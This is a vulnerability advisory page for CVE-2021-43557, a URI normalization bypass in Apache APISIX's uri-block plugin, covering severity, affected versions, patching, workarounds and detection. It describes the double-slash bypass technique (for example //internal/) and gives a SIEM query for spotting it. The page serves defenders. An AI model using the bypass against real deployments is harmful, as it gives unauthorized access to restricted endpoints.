CVE-2021-43557 – CVE-2021-43557 is a URI normalization bypass vu... (How to Fix)

Q: What is the severity of CVE-2021-43557?

CVE-2021-43557 has a CVSS score of 7.5 (HIGH). CVE-2021-43557 is a URI normalization bypass vulnerability in Apache APISIX's uri-block plugin that allows attackers to bypass block lists by using specially crafted URIs with double slashes or other normalization issues. This affects Apache APISIX deployments using the uri-block plugin or other plugins with similar URI handling logic. Attackers can potentially access restricted endpoints that should be blocked.

📋 TL;DR

CVE-2021-43557 is a URI normalization bypass vulnerability in Apache APISIX's uri-block plugin that allows attackers to bypass block lists by using specially crafted URIs with double slashes or other normalization issues. This affects Apache APISIX deployments using the uri-block plugin or other plugins with similar URI handling logic. Attackers can potentially access restricted endpoints that should be blocked.

💻 Affected Systems

Products:

Apache APISIX

Versions: All versions before 2.10.2

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects deployments using uri-block plugin or other plugins with similar $request_uri handling. Custom plugins may also be affected.

📦 What is this software?

Apisix by Apache

View all CVEs affecting Apisix →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete bypass of security controls allowing unauthorized access to internal/admin endpoints, potentially leading to data exposure, privilege escalation, or further attacks.

🟠

Likely Case

Partial bypass of URI-based access controls allowing access to some restricted endpoints that should be blocked by the uri-block plugin.

🟢

If Mitigated

Limited impact with proper network segmentation and additional authentication layers preventing full exploitation.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires knowledge of block list patterns and ability to send HTTP requests. Examples provided in advisory show simple bypass techniques.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.10.2

Vendor Advisory: https://lists.apache.org/thread/18jyd458ptocr31rnkjs71w4h366mv7h

Restart Required: Yes

Instructions:

1. Upgrade Apache APISIX to version 2.10.2 or later. 2. Restart APISIX service. 3. Verify the fix by testing URI normalization.

🔧 Temporary Workarounds

Custom URI Normalization

all

Implement custom URI normalization in plugins to normalize $request_uri before processing

Modify plugin code to normalize URIs: local normalized_uri = ngx.re.sub(uri, "//+", "/")

WAF Rule

all

Deploy WAF rules to detect and block double-slash URI patterns

🧯 If You Can't Patch

Disable uri-block plugin and use alternative access control methods
Implement network-level controls to restrict access to potentially vulnerable endpoints

🔍 How to Verify

Check if Vulnerable:

Test if URIs with double slashes (like //internal/) bypass block list rules that should block /internal/

Check Version:

apisix version

Verify Fix Applied:

After patching, test that normalized URIs are properly handled and block lists work correctly

📡 Detection & Monitoring

Log Indicators:

HTTP requests with double slashes in URI
Access to blocked endpoints via alternative URI patterns

Network Indicators:

Unusual URI patterns in HTTP traffic
Requests to endpoints that should be blocked

SIEM Query:

http.uri contains "//" AND (http.uri contains "internal" OR http.uri contains restricted_patterns)

📊 Metadata

CVE ID: CVE-2021-43557

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE: CWE-77

Published: November 22, 2021

Last Updated: November 21, 2024

🔗 References

http://www.openwall.com/lists/oss-security/2021/11/22/1 Mailing List,Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/11/22/2 Mailing List,Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/11/23/1 Exploit,Mailing List,Third Party Advisory
https://lists.apache.org/thread/18jyd458ptocr31rnkjs71w4h366mv7h Exploit,Mailing List,Vendor Advisory
http://www.openwall.com/lists/oss-security/2021/11/22/1 Mailing List,Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/11/22/2 Mailing List,Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/11/23/1 Exploit,Mailing List,Third Party Advisory
https://lists.apache.org/thread/18jyd458ptocr31rnkjs71w4h366mv7h Exploit,Mailing List,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-43557, you might also want to check these: